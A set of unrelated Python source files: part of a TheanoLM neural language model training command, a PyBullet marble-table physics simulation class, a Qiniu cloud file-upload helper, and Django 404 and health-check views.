metavar='N', type=int, default='5', help='cross-validate for reducing learning rate or early stopping N ' 'times per training epoch (default 5)') argument_group.add_argument( '--patience', metavar='N', type=int, default=4, help='allow perplexity to increase N consecutive cross-validations, ' 'before decreasing learning rate; if less than zero, never ' 'decrease learning rate (default 4)') argument_group.add_argument( '--random-seed', metavar='N', type=int, default=None, help='seed to initialize the random state (default is to seed from a ' 'random source provided by the oprating system)') argument_group = parser.add_argument_group("optimization") argument_group.add_argument( '--optimization-method', metavar='NAME', type=str, default='adagrad', choices=['sgd', 'nesterov', 'adagrad', 'adadelta', 'rmsprop-sgd', 'rmsprop-nesterov', 'adam'], help='optimization method, one of "sgd", "nesterov", "adagrad", ' '"adadelta", "rmsprop-sgd", "rmsprop-nesterov", "adam" ' '(default "adagrad")') argument_group.add_argument( '--learning-rate', metavar='ALPHA', type=float, default=0.1, help='initial learning rate (default 0.1)') argument_group.add_argument( '--l1-regularization', metavar='LAMBDA', type=float, default=None, help='add L1 regularization term with weight LAMBDA to the cost') argument_group.add_argument( '--l2-regularization', metavar='LAMBDA', type=float, default=None, help='add L2 regularization term with weight LAMBDA to the cost') argument_group.add_argument( '--momentum', metavar='BETA', type=float, default=0.9, help='momentum coefficient for momentum optimization methods (default ' '0.9)') argument_group.add_argument( '--gradient-decay-rate', metavar='GAMMA', type=float, default=0.9, help='geometric rate for averaging gradients (default 0.9)') argument_group.add_argument( '--sqr-gradient-decay-rate', metavar='GAMMA', type=float, default=0.999, help='geometric rate for averaging squared gradients in Adam optimizer ' '(default 0.999)') argument_group.add_argument( '--numerical-stability-term', metavar='EPSILON', type=float, default=1e-6, help='a value that is used to prevent instability when dividing by ' 'very small numbers (default 1e-6)') argument_group.add_argument( '--gradient-normalization', metavar='THRESHOLD', type=float, default=5, help='scale down the gradients if necessary to make sure their norm ' '(normalized by mini-batch size) will not exceed THRESHOLD ' '(default 5)') argument_group.add_argument( '--cost', metavar='NAME', type=str, default='cross-entropy', choices=['cross-entropy', 'nce', 'blackout'], help='cost function, one of "cross-entropy" (default), "nce" ' '(noise-contrastive estimation), or "blackout"') argument_group.add_argument( '--num-noise-samples', metavar='K', type=int, default=5, help='sampling based costs sample K noise words per one training word ' '(default 5)') argument_group.add_argument( '--noise-distribution', metavar='DIST', type=str, default='uniform', choices=['uniform', 'log-uniform', 'unigram'], help='sample noise from DIST; one of "uniform" (default, but less ' 'accurate), "log-uniform" (the vocabulary should be ordered by ' 'decreasing frequency), "unigram" (unigram distribution of words ' 'in training data, slow)') argument_group.add_argument( '--noise-dampening', metavar='ALPHA', type=float, default=0.5, help='the empirical unigram distribution is raised to the power ALPHA ' 'before sampling noise words; 0.0 corresponds to the uniform ' 'distribution and 1.0 corresponds to the unigram distribution ' '(only applicable with --noise-distribution=unigram, default 0.5)') argument_group.add_argument( '--noise-sharing', metavar='SHARING', type=str, default=None, choices=['seq', 'batch', None], help='can be "seq" for sharing noise samples between mini-batch ' 'sequences, or "batch" for sharing noise samples across einter ' 'mini-batch for improved speed (default is no sharing, which is ' 'very slow)') argument_group.add_argument( '--exclude-unk', action="store_true", help="exclude <unk> tokens from cost and perplexity computations") argument_group.add_argument( '--weights', metavar='LAMBDA', type=float, nargs='*', default=[], help='scale a mini-batch update by LAMBDA if the data is from the ' 'corresponding training file (list the weights in the same order ' 'as the training files)') argument_group = parser.add_argument_group("early stopping") argument_group.add_argument( '--stopping-criterion', metavar='NAME', type=str, default='annealing-count', choices=['epoch-count', 'no-improvement', 'annealing-count'], help='selects a criterion for early-stopping, one of "epoch-count" ' '(fixed number of epochs), "no-improvement" (no improvement since ' 'learning rate was decreased), "annealing-count" (default, ' 'learning rate is decreased a fixed number of times)') argument_group.add_argument( '--min-epochs', metavar='N', type=int, default=1, help='perform at least N training epochs (default 1)') argument_group.add_argument( '--max-epochs', metavar='N', type=int, default=100, help='perform at most N training epochs (default 100)') argument_group.add_argument( '--max-annealing-count', metavar='N', type=int, default=0, help='when using annealing-count stopping criterion, continue training ' 'after decreasing learning rate at most N times (default 0)') argument_group = parser.add_argument_group("configuration") argument_group.add_argument( '--default-device', metavar='DEVICE', type=str, default=None, help='when multiple GPUs are present, use DEVICE as default') argument_group = parser.add_argument_group("logging and debugging") argument_group.add_argument( '--log-file', metavar='FILE', type=str, default='-', help='path where to write log file (default is standard output)') argument_group.add_argument( '--log-level', metavar='LEVEL', type=str, default='info', choices=['debug', 'info', 'warn'], help='minimum level of events to log, one of "debug", "info", "warn" ' '(default "info")') argument_group.add_argument( '--log-interval', metavar='N', type=int, default=1000, help='print statistics of every Nth mini-batch update; quiet if less ' 'than one (default 1000)') argument_group.add_argument( '--debug', action="store_true", help='use test values to get better error messages from Theano') argument_group.add_argument( '--print-graph', action="store_true", help='print Theano computation graph') argument_group.add_argument( '--profile', action="store_true", help='enable profiling Theano functions') argument_group.add_argument( '--load-and-train', action="store_true", help='load the weight matrices from the MODEL and retrain') def _read_vocabulary(args, state): """If ``state`` contains data, reads the vocabulary from the HDF5 state. Otherwise reads a vocabulary file or constructs the vocabulary from the training set and writes it to the HDF5 state. If the state does not contain data and --vocabulary argument is given, reads the vocabulary from the file given after the argument. The rest of the words in the training set will be added as out-of-shortlist words. If the state does not contain data and no vocabulary is given, constructs a vocabulary that contains all the training set words. In that case, --num-classes argument can be used to control the number of classes. :type args: argparse.Namespace :param args: a collection of command line arguments :type state: hdf5.File :param state: HDF5 file where the vocabulary should be saved :rtype: Vocabulary :returns: the created vocabulary """ if state.keys(): logging.info("Reading vocabulary from existing network state.") result = Vocabulary.from_state(state) if not result.has_unigram_probs(): # This is for backward compatibility. Remove at some point. logging.info("Computing unigram word probabilities from training " "set.") word_counts = compute_word_counts(args.training_set) shortlist_words = list(result.id_to_word) shortlist_set = set(shortlist_words) oos_words = [x for x in word_counts.keys() if x not in shortlist_set] result.id_to_word = numpy.asarray(shortlist_words + oos_words, dtype=object) result.word_to_id = {word: word_id for word_id, word in enumerate(result.id_to_word)} result.compute_probs(word_counts, update_class_probs=False) result.get_state(state) elif args.vocabulary is None: logging.info("Constructing vocabulary from training set.") word_counts = compute_word_counts(args.training_set) result = Vocabulary.from_word_counts(word_counts, args.num_classes) result.get_state(state) else: logging.info("Reading vocabulary from %s.", args.vocabulary) word_counts = compute_word_counts(args.training_set) oos_words = word_counts.keys() with open(args.vocabulary, 'rt', encoding='utf-8') as vocab_file: result = Vocabulary.from_file(vocab_file, args.vocabulary_format, oos_words=oos_words) if args.vocabulary_format == 'classes': logging.info("Computing class membership probabilities and unigram " "probabilities for out-of-shortlist words.") update_class_probs = True else: logging.info("Computing unigram probabilities for out-of-shortlist " "words.") update_class_probs = False result.compute_probs(word_counts, update_class_probs=update_class_probs) result.get_state(state) logging.info("Number of words in vocabulary: %d", result.num_words()) logging.info("Number of words in shortlist: %d", result.num_shortlist_words()) logging.info("Number of word classes: %d", result.num_classes()) return result def log_options(training_options, optimization_options, args): """Writes the command line arguments to debug log. """ logging.debug("Training options:") for option_name, option_value in sorted(training_options.items()): logging.debug(" %s: %s", option_name, str(option_value)) logging.debug("Optimization options:") for option_name, option_value in sorted(optimization_options.items()): logging.debug(" %s=%s", option_name, str(option_value)) logging.debug(" cost_function=%s", args.cost) logging.debug(" noise_distribution=%s", args.noise_distribution) logging.debug(" noise_dampening=%d", args.noise_dampening) logging.debug(" noise_sharing=%s", args.noise_sharing if args.noise_sharing is not None else 'no') logging.debug(" exclude_unk=%s", 'yes' if args.exclude_unk else 'no') logging.debug(" l1_regularization=%f", args.l1_regularization if args.l1_regularization is not None else 0.0) logging.debug(" l2_regularization=%f", args.l2_regularization if args.l2_regularization is not None else 0.0) logging.debug("Data sampling: %s", str(numpy.array(args.sampling))) def train(args): """A function that performs the "theanolm train" command. :type args: argparse.Namespace :param args: a collection of command line arguments """ numpy.random.seed(args.random_seed) log_file = args.log_file log_level = getattr(logging, args.log_level.upper(), None) if not isinstance(log_level, int): print("Invalid logging level requested:", args.log_level) sys.exit(1) log_format = '%(asctime)s %(funcName)s: %(message)s' if args.log_file == '-': logging.basicConfig(stream=sys.stdout, format=log_format, level=log_level) else: logging.basicConfig(filename=log_file, format=log_format, level=log_level) if args.debug: theano.config.compute_test_value = 'warn' logging.info("Enabled computing test values for tensor variables.") logging.warning("GpuArray backend will fail random number generation!") else: theano.config.compute_test_value = 'off' theano.config.profile = args.profile theano.config.profile_memory = args.profile with h5py.File(args.model_path, 'a', driver='core') as state: vocabulary = _read_vocabulary(args, state) if args.num_noise_samples > vocabulary.num_classes(): print("Number of noise samples ({}) is larger than the number of " "classes. This doesn't make sense and would cause unigram " "sampling to fail.".format(args.num_noise_samples)) sys.exit(1) num_training_files = len(args.training_set) if len(args.weights) > num_training_files: print("You specified more weights than training files.") sys.exit(1) weights = numpy.ones(num_training_files).astype(theano.config.floatX) for index, weight in enumerate(args.weights): weights[index] = weight if len(args.sampling) > num_training_files: print("You specified more sampling coefficients than training " "files.") sys.exit(1) training_options = { 'batch_size': args.batch_size, 'sequence_length': args.sequence_length, 'validation_frequency': args.validation_frequency, 'patience': args.patience, 'stopping_criterion': args.stopping_criterion, 'max_epochs': args.max_epochs, 'min_epochs': args.min_epochs, 'max_annealing_count': args.max_annealing_count } optimization_options = { 'method': args.optimization_method, 'epsilon': args.numerical_stability_term, 'gradient_decay_rate': args.gradient_decay_rate, 'sqr_gradient_decay_rate': args.sqr_gradient_decay_rate, 'learning_rate': args.learning_rate, 'weights': weights, 'momentum': args.momentum, 'max_gradient_norm': args.gradient_normalization, 'num_noise_samples': args.num_noise_samples, 'noise_sharing': args.noise_sharing, } log_options(training_options, optimization_options, args) logging.info("Creating trainer.") trainer = Trainer(training_options, vocabulary, args.training_set, args.sampling) trainer.set_logging(args.log_interval) logging.info("Building neural network.") if args.architecture == 'lstm300' or args.architecture == 'lstm1500': architecture = Architecture.from_package(args.architecture) else: with open(args.architecture, 'rt', encoding='utf-8') as arch_file: architecture = Architecture.from_description(arch_file) default_device = get_default_device(args.default_device) network = Network(architecture, vocabulary, trainer.class_prior_probs, default_device=default_device, profile=args.profile) network.set_sampling(args.noise_distribution, args.noise_dampening, args.noise_sharing) logging.info("Building optimizer.") exclude_id = vocabulary.word_to_id['<unk>'] if args.exclude_unk \ else None epsilon = args.numerical_stability_term if args.cost == 'cross-entropy': cost_function = CrossEntropyCost(network, exclude_id, args.l1_regularization, args.l2_regularization, epsilon) elif args.cost == 'nce': cost_function = NCECost(network, exclude_id, args.l1_regularization, args.l2_regularization, epsilon) else: assert args.cost == 'blackout' cost_function = BlackoutCost(network, exclude_id, args.l1_regularization, args.l2_regularization, epsilon) try: optimizer = create_optimizer(optimization_options, network, cost_function, profile=args.profile) except theano.gradient.DisconnectedInputError as e: print("Cannot train the neural network because some of the " "parameters are disconnected from the output. Make sure all " "the layers are correctly connected in the network " "architecture. The error message was: `{}´".format(e)) if args.print_graph: print("Cost function computation graph:") theano.printing.debugprint(optimizer.gradient_update_function) trainer.initialize(network, state, optimizer, args.load_and_train) if args.validation_file is not None: logging.info("Building text scorer for cross-validation.") scorer = TextScorer(network, use_shortlist=True, exclude_unk=args.exclude_unk, profile=args.profile) logging.info("Validation text: %s", args.validation_file.name) validation_mmap = mmap.mmap(args.validation_file.fileno(), 0, prot=mmap.PROT_READ) validation_iter = \ LinearBatchIterator(validation_mmap, vocabulary, batch_size=args.batch_size, max_sequence_length=args.sequence_length, map_oos_to_unk=False) trainer.set_validation(validation_iter, scorer) else: logging.info("Cross-validation will not be performed.") validation_iter = None logging.info("Training neural network.") trainer.train() if 'layers' not in state.keys(): print("The model has not been trained. No cross-validations were " "performed or training did not improve the model.") elif validation_iter is not None: network.set_state(state) perplexity = scorer.compute_perplexity(validation_iter) print("Best validation set perplexity:", perplexity)
py
1a3f9620319bdc533748190bd7a3ad8cf08805bd
from rbw import np from . import Sim # TODO document gravity class MarbleSim(Sim): """ Handles physics for `rbw.shapes.MarbleWorld` Objects with an initial velocity are configured. Defines a method `make_table` to describe a table top with bounderies along each edge. """ def __init__(self, scene_json, client): self.client = client self.world = scene_json #-------------------------------------------------------------------------# # Attributes @property def client(self): return self._client @client.setter def client(self, cid): if cid < 0: raise ValueError('Client is offline') self._client = cid @property def world(self): return self._world @world.setter def world(self, w): self.resetSimulation() self.setGravity(0, 0, -10) self.make_table(w['table']) init_force = w['init_force'] d = {} for obj,data in w['objects'].items(): d[obj] = self.make_obj(data) if obj in w['init_force']: f = init_force[obj] self.applyExternalForce(d[obj], -1, f, [0,0,0],self.LINK_FRAME) self._world = d #-------------------------------------------------------------------------# # Methods def make_table(self, params): # Table top base_id = self.make_obj(params) # table walls shape = self.GEOM_BOX exs = np.array(params['dims']) / 2.0 rot = self.getQuaternionFromEuler((np.pi/2, 0, 0)) wall_left = self.createCollisionShape(shape, halfExtents = exs) pos_left = [0, exs[1] + exs[2], 0] obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_left, basePosition = pos_left, baseOrientation = rot) self.update_obj(obj_id, params) pos_right = [0, -1 * (exs[1] + exs[2]), 0] wall_right = self.createCollisionShape(shape, halfExtents = exs) obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_right, basePosition = pos_right, baseOrientation = rot) self.update_obj(obj_id, params) pos_front = [(exs[1] + exs[2]), 0, 0] rot = self.getQuaternionFromEuler((0, np.pi/2, 0)) wall_front = self.createCollisionShape(shape, halfExtents = exs) obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_front, basePosition = pos_front, baseOrientation = rot,) self.update_obj(obj_id, params) pos_back = [-1*(exs[1] + exs[2]), 0, 0] wall_back = self.createCollisionShape(shape, halfExtents = exs) obj_id = self.createMultiBody(baseCollisionShapeIndex = wall_back, basePosition = pos_back, baseOrientation = rot,) self.update_obj(obj_id, params) return base_id
py
1a3f976dae6edfce0061348c37c99d309ccd9008
from qiniu import Auth, put_file from common import config def upload(file_name, file_path): """ 本地文件上传至七牛云 :param file_name: :param file_path: :return: """ # 构建鉴权对象 qn_auth = Auth(config.QN_ACCESS_KEY, config.QN_SECRET_KEY) # 生成上传 Token,可以指定过期时间等 token = qn_auth.upload_token(config.QN_BUCKET_NAME, file_name, 3600) ret, info = put_file(token, file_name, file_path) return ret, info
py
1a3f978c11f5c545982fb5039dd1cc57dfacaa46
from django.http import HttpResponse from django.shortcuts import render def handle_not_fonud(request, exception=None): """Handler for 404""" return render(request, '404.html', status=404) def health(request): """Health Check API""" return HttpResponse('ok')